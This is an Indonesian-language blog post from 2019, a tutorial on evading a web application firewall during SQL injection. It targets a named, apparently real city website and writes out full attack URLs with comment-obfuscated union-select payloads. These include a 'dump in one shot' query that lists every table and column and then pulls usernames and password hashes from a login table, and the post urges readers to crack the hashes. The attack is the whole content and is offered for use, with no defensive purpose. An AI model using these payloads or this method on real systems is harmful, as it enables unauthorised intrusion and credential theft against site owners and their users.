Tutorial Bypass WAF 403
September 16, 2019
Hai temen-temen dah lama banget gua menelantarkan nih blog hahaha. Ya karna males aja sih, lebih tepatnya gatau mau buat apa
Dan kali ini gua bakal membagi sedikit ilmu Bypass WAF 403
Kebetulan gua udah dapet target nya, http://smartcityjhansi.com/gallerylist.php?catid=10
Anggap saja kita sudah melakukan order+by untuk mendapatkan jumlah column nya, ketika gua mau union+select terkena security waf 403 Forbidden.
Bagaimana cara bypass nya? yuk simak baik-baik, untuk cara bypass nya gua bakal menambahkan beberapa mysql-comments.
Dari union+select menjadi /*!50000union*/+/*!50000select*/
Seperti ini: http://smartcityjhansi.com/gallerylist.php?catid=-10%27/*!50000union*/+/*!50000select*/+1,2,3,4,5--+
Bisa dilihat di gambar di bawah ini tidak terkena 403
Nah keliatan tuh angka ajaib nya haha, tinggal masukin dios nya (Dump in one shot)
/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@)
Seperti ini: http://smartcityjhansi.com/gallerylist.php?catid=-10%27/*!50000union*/+/*!50000select*/+1,2,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),4,5--+
/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000login*/)where@:=make_set(511,@,0x3c6c693e,/*!50000username*/,/*!50000password*/)),@)
Seperti ini: http://smartcityjhansi.com/gallerylist.php?catid=-10%27/*!50000union*/+/*!50000select*/+1,2,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000login*/)where@:=make_set(511,@,0x3c6c693e,/*!50000username*/,/*!50000password*/)),@),4,5--+
Nah keluar tuh username sama password, password nya masih ke encrypt tinggal kalian crack aja
Oke sekian dulu dari gua, makasih banget udah mampir kalian bisa comment di bawah buat tutorial apalagi selanjut nya see ya